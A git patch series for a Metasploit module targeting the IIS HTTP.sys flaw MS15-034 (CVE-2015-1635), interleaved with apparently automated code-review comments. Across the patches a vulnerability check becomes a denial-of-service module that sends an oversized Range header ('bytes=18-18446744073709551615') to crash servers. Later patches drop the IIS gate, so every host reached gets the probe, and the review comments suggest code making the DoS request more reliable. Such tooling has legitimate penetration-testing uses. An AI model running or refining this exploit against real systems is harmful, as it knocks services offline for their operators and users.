From 6f874b81ff3b67cbc19c008fca73a1f2fb498f1e Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Wed, 15 Apr 2015 01:37:43 -0500
Subject: [PATCH 1/9] Add MS15-034 check (CVE-2015-1635)
---
.../scanner/http/ms15_034_ulonglongadd.rb | 84 +++++++++++++++++++
1 file changed, 84 insertions(+)
create mode 100644 modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb
diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb
new file mode 100644
index 0000000000..2214b70957
--- /dev/null
+++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MS15-034 HTTP Protocol Stack Handling Vulnerability',
+ 'Description' => %q{
+ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A
+ vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code
+ execution.
+ },
+ 'Author' =>
+ [
+ 'billbillthebillbill', # He did all the work (see the pastebin code)
+ 'sinn3r' # MSF version of bill's work
+ ],
+ 'References' =>
+ [
+ ['CVE', '2015-1635'],
+ ['MSB', 'MS15-034'],
+ ['URL', 'http://pastebin.com/ypURDPc4']
+ ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path', '/'])
+ ], self.class)
+
+ deregister_options('RHOST')
+ end
+
+ def run_host(ip)
+ code = check_host(ip)
+ case code
+ when Exploit::CheckCode::Vulnerable
+ print_good("#{ip}:#{rport} - #{code.last}")
+ else
+ print_status("#{ip}:#{rport} - #{code.last}")
+ end
+ end
+
+ def check_host(ip)
+ uri = target_uri.path
+
+ res = send_request_raw({'uri'=>uri})
+ unless res
+ vprint_error("#{ip}:#{rport} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if !res.headers['Server'].include?('Microsoft-IIS')
+ vprint_error("#{ip}:#{rport} - Target isn't IIS")
+ return Exploit::CheckCode::Safe
+ end
+
+ res = send_request_raw({
+ 'uri' => uri,
+ 'method' => 'GET',
+ 'vhost' => 'stuff',
+ 'headers' => {
+ 'Range' => 'bytes=0-18446744073709551615'
+ }
+ })
+ if res && res.body.include?('Requested Range Not Satisfiable')
+ return Exploit::CheckCode::Vulnerable
+ elsif res && res.body.include?('The request has an invalid header name')
+ return Exploit::CheckCode::Safe
+ else
+
return Exploit::CheckCode::Unknown + end + end + +end \ No newline at end of file From 63048a73855e3137d91565bd4919d9a824a92d1a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 01:38:09 -0500 Subject: [PATCH 2/9] Newline -_- --- modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 2214b70957..0df562d40f 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end From 2206ae48a119f79c0d1c8eb571010d43a593bb49 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 01:50:59 -0500 Subject: [PATCH 3/9] Match the PR title --- modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 0df562d40f..4ea73515d5 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'MS15-034 HTTP Protocol Stack Handling Vulnerability', + 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Vulnerability', 'Description' => %q{ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code From 7a77dbc9f0bbe1af09eda269ecc46f21115fce75 Mon Sep 17 00:00:00 2001 
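Review bot: The IIS gate in check_host dereferences a header that may not be there: `res.headers['Server']` is nil when the server omits or strips the Server header, so `.include?('Microsoft-IIS')` raises NoMethodError instead of returning a CheckCode; `unless res.headers['Server'].to_s.include?('Microsoft-IIS')` keeps the existing Safe path and avoids the `if !` form. That header is routinely removed by hardening guides and reverse proxies, so a negative match only means "not advertised as IIS", which the vprint_error wording could state rather than "Target isn't IIS". Separately, the first `send_request_raw({'uri'=>uri})` uses a different hash spacing from the second call a few lines down; `'uri' => uri` would match.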
From: sinn3r Date: Wed, 15 Apr 2015 10:15:40 -0500 Subject: [PATCH 4/9] Update description --- modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 4ea73515d5..5beab2f56d 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -16,7 +16,8 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code - execution. + execution. Please note this module could potentially cause a denail-of-service against + the servers you're testing. }, 'Author' => [ From 19ab71aa43a3c726e4280bd6b5851202b27bb54d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 10:20:15 -0500 Subject: [PATCH 5/9] Final update i swear --- .../auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 5beab2f56d..5ae4c1a932 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'billbillthebillbill', # He did all the work (see the pastebin code) - 'sinn3r' # MSF version of bill's work + 'Bill Finlayson', # He did all the work (see the pastebin code), twitter: @hectorh56193716 + 'sinn3r' # MSF version of bill's work ], 'References' => [ 
@@ -52,14 +52,20 @@ class Metasploit3 < Msf::Auxiliary end def check_host(ip) - uri = target_uri.path + uri = normalize_uri(target_uri.path) res = send_request_raw({'uri'=>uri}) + unless res vprint_error("#{ip}:#{rport} - Connection timed out") return Exploit::CheckCode::Unknown end + if res.code == 404 + print_error("#{ip}:#{rport} - URI must be a valid resource") + return + end + if !res.headers['Server'].include?('Microsoft-IIS') vprint_error("#{ip}:#{rport} - Target isn't IIS") return Exploit::CheckCode::Safe From 3aa8e6908d7c3cdd5ee2992402eaa2c308bd0643 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 13:13:16 -0500 Subject: [PATCH 6/9] Converted to a DOS module --- .../http/ms15_034_ulonglongadd.rb | 54 ++++++++++++++----- 1 file changed, 41 insertions(+), 13 deletions(-) rename modules/auxiliary/{scanner => dos}/http/ms15_034_ulonglongadd.rb (52%) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb similarity index 52% rename from modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb rename to modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 5ae4c1a932..0b5796012a 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb 
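Review bot: The new 404 guard is the only status-code check, so a 401, 403 or a 3xx for TARGETURI still falls through to the Range probe although none of those shows the URI is a servable resource, which is what the new error message demands; unless the intent is to probe anything HTTP.sys answers, a tighter precondition would be `unless res.code == 200` with a message that names the code, e.g. `vprint_error("#{ip}:#{rport} - Got #{res.code}, URI must be a valid resource")`. The bare `return` also hands nil back to run_host, whose `code.last` then fails with NoMethodError; run_host is outside this hunk, and check_host continues past the end of it.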
@@ -7,50 +7,78 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary + # Watch out, dos all the things include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, - 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Vulnerability', + 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service', 'Description' => %q{ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code - execution. Please note this module could potentially cause a denail-of-service against - the servers you're testing. + execution. This module will try to cause a denail-of-service. + + Please note that you must supply a valid file resource for the TARGETURI option. + By default, IIS may come with these settings that you could try: iisstart.htm, + welcome.png, iis-85.png, etc. }, 'Author' => [ - 'Bill Finlayson', # He did all the work (see the pastebin code), twitter: @hectorh56193716 - 'sinn3r' # MSF version of bill's work + # Bill did all the work (see the pastebin code), twitter: @hectorh56193716 + 'Bill Finlayson', + # MSF. 
But really, these people made it happen: + # https://github.com/rapid7/metasploit-framework/pull/5150 + 'sinn3r' ], 'References' => [ ['CVE', '2015-1635'], ['MSB', 'MS15-034'], - ['URL', 'http://pastebin.com/ypURDPc4'] + ['URL', 'http://pastebin.com/ypURDPc4'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'] ], 'License' => MSF_LICENSE )) register_options( [ - OptString.new('TARGETURI', [true, 'The base path', '/']) + OptString.new('TARGETURI', [true, 'A valid file resource', '/welcome.png']) ], self.class) deregister_options('RHOST') end def run_host(ip) - code = check_host(ip) - case code - when Exploit::CheckCode::Vulnerable - print_good("#{ip}:#{rport} - #{code.last}") + if check_host(ip) == Exploit::CheckCode::Vulnerable + dos_host(ip) else - print_status("#{ip}:#{rport} - #{code.last}") + print_status("#{ip}:#{rport} - Probably not vulnerable, will not dos it.") end end + def dos_host(ip) + # In here we have to use Rex because if we dos it, it causes our module to hang too + uri = normalize_uri(target_uri.path) + begin + cli = Rex::Proto::Http::Client.new(ip) + cli.connect + req = cli.request_raw({ + 'uri' => uri, + 'method' => 'GET', + 'vhost' => 'stuff', + 'headers' => { + 'Range' => 'bytes=18-18446744073709551615' + } + }) + cli.send_request(req) + rescue ::Errno::EPIPE, ::Timeout::Error + # Same exceptions the HttpClient mixin catches + end + print_status("#{ip}:#{rport} - DOS request sent") + end + def check_host(ip) uri = normalize_uri(target_uri.path) @@ -62,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary end if res.code == 404 - print_error("#{ip}:#{rport} - URI must be a valid resource") + vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.") return end From 90ed6ee0b6f127d27468c4b95a07e5509906c2c6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 13:32:11 -0500 Subject: [PATCH 7/9] No "vhost" --- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 -- 1 file changed, 2 deletions(-) 
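Review bot: dos_host opens `Rex::Proto::Http::Client.new(ip)` with no port, so the request goes to the client's default port rather than the module's `rport`, while the status line right after reports `#{ip}:#{rport}`; the SSL setting the HttpClient mixin honours in check_host is likewise not passed, so the check and the DoS request can land on different endpoints. The client is never closed (no `ensure`), and `print_status("... DOS request sent")` runs even when the rescue swallowed the failure, so the log claims a request that may never have left the host. A reset or refused connection is also outside the rescued classes and would abort the scan with a raw exception — presumably what a host that stops answering produces, though the exact errors Rex raises there are not visible in the hunk. The description string still carries the typo `denail-of-service` (also in the patch 4 hunk). Restructured with an ensure and a sent flag:
```ruby
  def dos_host(ip)
    # Use Rex directly: the mixin's client would hang the module once the target stops answering
    uri = normalize_uri(target_uri.path)
    sent = false
    cli = nil
    begin
      # Honour the module's RPORT and SSL settings, as check_host does through the mixin
      cli = Rex::Proto::Http::Client.new(ip, rport, {}, ssl)
      cli.connect
      # … unchanged: request_raw with the Range header …
      cli.send_request(req)
      sent = true
    rescue ::Errno::EPIPE, ::Timeout::Error, ::Errno::ECONNRESET, ::Errno::ECONNREFUSED
      # Same exceptions the HttpClient mixin catches, plus the ones a dropped connection raises
    ensure
      cli.close if cli
    end
    if sent
      print_status("#{ip}:#{rport} - DOS request sent")
    else
      print_error("#{ip}:#{rport} - DOS request could not be sent")
    end
  end
```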
diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 0b5796012a..a23883a7c0 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -67,7 +67,6 @@ class Metasploit3 < Msf::Auxiliary req = cli.request_raw({ 'uri' => uri, 'method' => 'GET', - 'vhost' => 'stuff', 'headers' => { 'Range' => 'bytes=18-18446744073709551615' } @@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'uri' => uri, 'method' => 'GET', - 'vhost' => 'stuff', 'headers' => { 'Range' => 'bytes=0-18446744073709551615' } From 8a542b841c7dfa2827f08feeb9991fc02b69dfee Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 13:33:09 -0500 Subject: [PATCH 8/9] Don't check Server header --- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index a23883a7c0..6e0874e6a9 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -93,11 +93,6 @@ class Metasploit3 < Msf::Auxiliary return end - if !res.headers['Server'].include?('Microsoft-IIS') - vprint_error("#{ip}:#{rport} - Target isn't IIS") - return Exploit::CheckCode::Safe - end - res = send_request_raw({ 'uri' => uri, 'method' => 'GET', From 76d36a46dc640f77b4dc8c91f019d1ef6776b643 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 14:04:18 -0500 Subject: [PATCH 9/9] Missing a checkcode --- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 6e0874e6a9..5224b89012 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb 
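Review bot: With the IIS gate removed (patch 8 hunk), check_host sends the full-range probe to every host it reaches, and the patch 4 description already flagged that probe as potentially disruptive, so non-IIS and misidentified hosts now receive it too. If the gate was dropped because the Server header is often suppressed, a soft version keeps the signal without blocking: `vprint_warning("#{ip}:#{rport} - Server header is #{res.headers['Server'].inspect}, not advertised as IIS") unless res.headers['Server'].to_s.include?('Microsoft-IIS')`. check_host starts and ends outside this hunk.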
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary if res.code == 404 vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.") - return + return Exploit::CheckCode::Unknown end res = send_request_raw({
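Review bot: Returning `Exploit::CheckCode::Unknown` on a 404 fixes the contract, but the message explaining it is only emitted through `vprint_error`, so without VERBOSE the operator sees run_host's "Probably not vulnerable, will not dos it." for what is actually a misconfigured TARGETURI (run_host is outside this hunk). Since the description makes a valid file resource a hard requirement, `print_error` here, or a comment `# 404 means the URI was not a servable resource, not that the host is safe`, would keep the two cases from being confused. check_host starts and ends outside this hunk.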